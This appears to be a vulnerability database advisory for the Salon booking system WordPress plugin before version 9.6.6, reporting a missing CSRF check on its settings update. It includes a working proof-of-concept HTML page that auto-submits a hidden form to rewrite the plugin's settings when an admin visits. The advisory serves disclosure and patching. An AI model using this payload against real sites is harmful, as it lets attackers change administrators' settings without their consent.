Salon booking system < 9.6.6 - Settings Update via CSRF

2024-04-0500:00:00

Bob Matyas

salon booking system

csrf

settings update

vulnerability

update

april 19

2024

AI Score

6.6

Confidence

Low

EPSS

Percentile

9.0%

JSON

Description The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack

Make an admin open a page containing the code:

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=salon-settings" method="POST"> 
        <input type="hidden" name="_wp_http_referer" value="/wp-admin/admin.php?page=salon-settings">
      
        <!-- These are the text inputs -->
        <input type="text" name="salon_settings[gen_name]" value="csrf">
        <input type="email" name="salon_settings[gen_email]" value="[email protected]">
        <input type="text" name="salon_settings[gen_phone]" value="csrf">
        <input type="text" name="salon_settings[gen_address]" value="">
      
        <!-- File input for gen_logo -->
        <input type="file" name="salon_settings[gen_logo]" filename="">
        
        <!-- More inputs -->
        <input type="text" name="salon_settings[date_format]" value="default">
        <input type="text" name="salon_settings[time_format]" value="default">
        <!-- ... Include other input elements here ... -->
      
        <input type="text" name="salon_settings[feedback_email_subject]" value="WPScan Vulnerability Testbench">
        <input type="text" name="salon_settings[zapier_site_url]" value="">
        <input type="text" name="salon_settings[zapier_api_key]" value="">
      
        <input type="submit" value="Submit">
        <input type="submit" name="reset" value="Reset Settings">
    </form>
</body>
```